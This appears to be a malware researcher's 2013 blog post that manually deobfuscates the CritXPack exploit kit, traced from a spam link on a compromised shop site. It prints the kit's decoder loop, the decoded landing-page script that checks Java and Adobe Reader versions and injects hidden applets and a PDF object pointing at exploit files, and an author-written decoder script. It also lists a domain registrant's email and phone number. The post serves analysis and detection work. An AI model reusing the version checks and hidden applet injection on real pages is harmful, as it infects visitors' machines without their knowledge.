Since we are focusing on manually deobfuscating the malware code, I'm sorry that the payload information will not be included in this post (the know-how on the exploit kit's obfuscation is the target here, and the moronz can change the payload to anything they want anyway).

BTW, here is a capture of the infected, or rather I'd say INFECTOR, site:

[capture of the infector site]
The infector site's domain name has Chinese registrant data:

Domain Name: kaovo.com
Registrant Contact: juxiangpin xiangpin ju bestpa1@hotmail.com
telephone: +86.02088889929
fax: +86.02088889927
kandung jinyang jinyang kandung 800267 CN

OK. Enough for the teaser, we'll make it quick, so here we go:
It starts with the below spam URL:

#MalwareMustDie!
h00p://www.themabbutt.com/index.php?cPath=24

We fetched the index.php:

Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212
Caching www.themabbutt.com => 74.200.90.212
Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected.
:
GET /index.php?cPath=24 HTTP/1.0
User-Agent: MMD Crusader
Host: www.themabbutt.com
Connection: Keep-Alive

HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2013 08:15:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
200 OK
Length: unspecified [text/html]
17:15:14 (44.68 KB/s) - `index.php' saved

It has two obfuscated script blocks at the end of the file:

[capture of the two obfuscated blocks at the end of index.php]

Both obfuscated blocks have the same structure below:

// the obfuscation data:
if(1) {
f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1
105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,
97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,
6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,
:

// and the deobfuscation generator code:
for(i=0;-i+628!=0;i+=1) {
j=i;
if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));
}

So the loop walks all 628 elements of the array and each output character is simply the array value plus (index mod 4). The `031==0x19` test is junk to slow down the reader: octal 031 and hex 0x19 are both 25, so it is always true, and `String["fro"+"mCharCode"]` is just String.fromCharCode with the name split to dodge naive string matching.

Use the above logic on both obfuscated blocks and they will be burped out as the deobfuscated code below:

[capture of the deobfuscated code, containing two URLs]

The second URL just forwards you to Google, but if we download the source of the first URL and look inside, it contains the suspicious link below, which I fetched like this:

--17:21:10-- h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/
=> `i.php@token=speed%2F'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0
Referer: h00p://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader Agent
Host: root.kaovo.com
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:

After some "fun" effort receiving 302s, finally we received the i.php:

$ ls -alF i.php
-rwx------ xxxx xxxx 2644 Jan 12 21:58 i.php*
MD5: 39583fcb535d2925a5000f4b8deae64a

PS, here are the server's headers:

Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14

A failed/blocked attempt will bounce you to yandex.ru's robots.txt instead:

HTTP/1.1 302 Found
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Location: h00p://www.yandex.ru/robots.txt
Vary: Accept-Encoding

The Landing Page Script
The i.php file contains 2 lines of obfuscated script. It is the landing page of the CritX Exploit Kit. Let's make it a more "viewable" structure :-)

[capture of the reformatted i.php, with the line numbers referenced below]

With the below explanation:

1. The pd.js is PluginDetect 0.7.9, used to guard the pages of this EK. Unlike other EKs, it is a separate download and is shared with the other infector files.
2. The obfuscated code is found in the script, after the checks using pd.js have passed; it is a packed script, as shown in line 9.
3. There is a direct-download infector in line 14, using the meta refresh tag method.
4. The moronz put the variable used for deobfuscation in another part (line 18).

Let's see the PluginDetect used:

--17:30:05-- h00p://root.kaovo.com/n121212p/awsxd/js/pd.js
=> `pd.js'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
:
GET /n121212p/awsxd/js/pd.js HTTP/1.0
Referer: http://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader
Host: root.kaovo.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:29:56 GMT
Content-Type: application/javascript
Content-Length: 28592
Connection: keep-alive
Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT
ETag: "2e0a69-6fb0-4cf1003249c80"
Accept-Ranges: bytes
Vary: Accept-Encoding
:
200 OK
Length: 28,592 (28K) [application/javascript]
17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]

This is the inside, a one-line script; hello PluginDetect 0.7.9:

[capture of pd.js]

Decoding Obfuscation Infector Script
So how do we decode the infector part? Let's see the good structure first:

[capture of the cleaned-up i.php generator and data]

It is a simple structure: by feeding the generator the obfuscation data, with the garbage/unnecessary code eliminated, we get the deobfuscated script saved in the "e" variable, here -->>[PASTEBIN]

Looking at the code, we see the infector is aiming to check your Java version (by fetching the result from PluginDetect 0.7.9):

var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split(".");
if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 7) && (GfkghfHqFF9[3] < 9)){
    Y9Nmp1nN7 = 7
} else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 6) && (GfkghfHqFF9[3] < 33)){
    Y9Nmp1nN7 = 6
} else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] < 6)){
    Y9Nmp1nN7 = 5
} else {
    Y9Nmp1nN7 = 0
}

And your PDF version (also fetching the result from PluginDetect 0.7.9):

var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split(".");
if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] < 4))){
    selJdFtA = 2
} else {
    selJdFtA = 0
}

As written, that selects Java 7 before update 9, Java 6 before update 33, anything older than Java 6, and Adobe Reader 8.x or 9.0 to 9.3; a fully patched box gets 0 on both counts. The return values 7, 6, 5, 2 and 0 are then used to trigger the jar and PDF exploit downloads in the code below:

// case of return code zero ---> redirected into YANDEX....
if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){
    // the token %64%65%66%61%75%6c%74 is just URL-encoded "default"
    document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&"
}
if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download
    document.write(' <div style="visibility:hidden"> <applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>')
}
if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download
    document.write(' <div style="visibility:hidden"> <applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>')
}
if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download
    document.write(' <div style="visibility:hidden"> <applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1"> <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp"> </applet></div>')
}
if (selJdFtA == 2){ // case of "2" pdf exploit download
    document.write(' <div style="visibility:hidden"> <object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10"> </object></div>')
}

So the point is: three jars (j15.php, j16.php, j17.php, one per Java generation) and one PDF (lpdf.php) are the weapons of the current CritXPack Exploit Kit case, all loaded from a hidden div as 1x1 or 10x10 elements so the victim sees nothing. Note that the applet "oh" parameter is itself encoded and is what the jar uses to find the payload, which is exactly why the payload is not covered in this post.
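Bonus: the decoder loop we saw in index.php, written out as a stand-alone script that you can point at a captured blob. This is an example I'm adding for this write-up, not the kit's own code: it re-implements the `1*w[j]+j%4` transform, pulls the `new Array(...)` data, the `-i+628!=0` loop bound and the modulus out of a script blob, checks that the bound matches the array length, and then pulls the applet archive= and object data= URLs (the j15/j16/j17 jars and the lpdf PDF in this case) out of the decoded document.write() calls. The blob it runs on is constructed here from a plaintext snippet in the kit's style and encoded with the inverse transform so it round-trips; it is not a wild capture, and the function names and regexes are mine.

```javascript
// Added example for this write-up, not the kit's code. Re-implements the
// index.php stage decoder (s += String.fromCharCode(1*w[j] + j%4)) as a
// stand-alone script and pulls exploit URLs out of the decoded output.

// Decode one charcode array. `modulus` reproduces the "j%4" term; it is read
// from the captured script because another sample may use a different one.
function decodeCharcodes(w, modulus) {
  let s = "";
  for (let j = 0; j < w.length; j++) {
    s += String.fromCharCode(1 * w[j] + (j % modulus));
  }
  return s;
}

// Inverse transform. Only used to build the constructed sample below; the
// real kit does this server-side.
function encodeCharcodes(text, modulus) {
  const out = [];
  for (let j = 0; j < text.length; j++) {
    out.push(text.charCodeAt(j) - (j % modulus));
  }
  return out;
}

// Pull the array, the loop bound and the modulus out of a captured script blob.
// Assumes the shapes seen in this post: `x=new Array(9,8,...)` and
// `for(i=0;-i+628!=0;i+=1)` with `j%4` inside. Returns null when any is absent
// or when the loop bound does not match the array length (spliced-in junk).
function parseStage(scriptText) {
  const arr = scriptText.match(/\b([A-Za-z_$][\w$]*)\s*=\s*new Array\(([\d\s,]+)\)/);
  const loop = scriptText.match(/for\s*\(\s*i\s*=\s*0\s*;\s*-i\+(\d+)\s*!=\s*0/);
  const mod = scriptText.match(/j\s*%\s*(\d+)/);
  if (!arr || !loop || !mod) return null;
  const w = arr[2].split(",").map((v) => v.trim()).filter((v) => v.length > 0).map(Number);
  if (Number(loop[1]) !== w.length) return null;
  return { name: arr[1], w, modulus: Number(mod[1]) };
}

// Extract exploit resources from the decoded document.write() HTML: the
// applet archive= (jars) and object data= (PDF) attributes.
function extractExploitUrls(decoded) {
  const urls = [];
  const re = /<(?:applet|object)\b[^>]*?\b(?:archive|data)="([^"]+)"/g;
  let m;
  while ((m = re.exec(decoded)) !== null) urls.push(m[1]);
  return urls;
}

// Whole pipeline: parse -> decode -> extract.
function analyze(scriptText) {
  const stage = parseStage(scriptText);
  if (!stage) return null;
  const decoded = decodeCharcodes(stage.w, stage.modulus);
  return { name: stage.name, decoded, urls: extractExploitUrls(decoded) };
}

// Constructed sample: plaintext in the kit's style (hidden applet plus a PDF
// object), encoded with the same transform so it round-trips. Not a wild capture.
const PLAINTEXT =
  'if (Y9Nmp1nN7 == 7){ document.write(\'<div style="visibility:hidden"><applet code="E" archive="j17.php?i=AAAA" width="1" height="1"></applet></div>\') }' +
  'if (selJdFtA == 2){ document.write(\'<div style="visibility:hidden"><object type="application/pdf" data="lpdf.php?i=BBBB&" width="10" height="10"></object></div>\') }';
const SAMPLE_SCRIPT =
  "if(1) { w=new Array(" + encodeCharcodes(PLAINTEXT, 4).join(",") + "); }\n" +
  "for(i=0;-i+" + PLAINTEXT.length + "!=0;i+=1) { j=i; " +
  "if((031==0x19))if(e)s=s+String[\"fro\"+\"mCharCode\"]((1*w[j]+j%4)); }";

const report = analyze(SAMPLE_SCRIPT);
console.log(report.decoded);
console.log(report.urls); // j17.php?i=AAAA and lpdf.php?i=BBBB&
```

Run it with node; for a real sample, paste the captured `new Array(...)` and `for(...)` lines into SAMPLE_SCRIPT in place of the constructed one. If the kit changes the transform (another modulus, or an added constant), decodeCharcodes() is the only function to touch; the length check in parseStage() is there because a loop bound that no longer matches the array is the usual sign that junk elements were spliced into the data to break lazy decoders.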
The samples of these infector scripts are here -->>[MEDIAFIRE]
Current infection landing page reference-1 at URLQuery -->>[URLQuery]
Current infection's redirector reference-2 at URLQuery -->>[URLQuery]
More CritXPack reference at Malware don't need Coffee -->>[HERE]

[UPDATED]
*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs
*) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae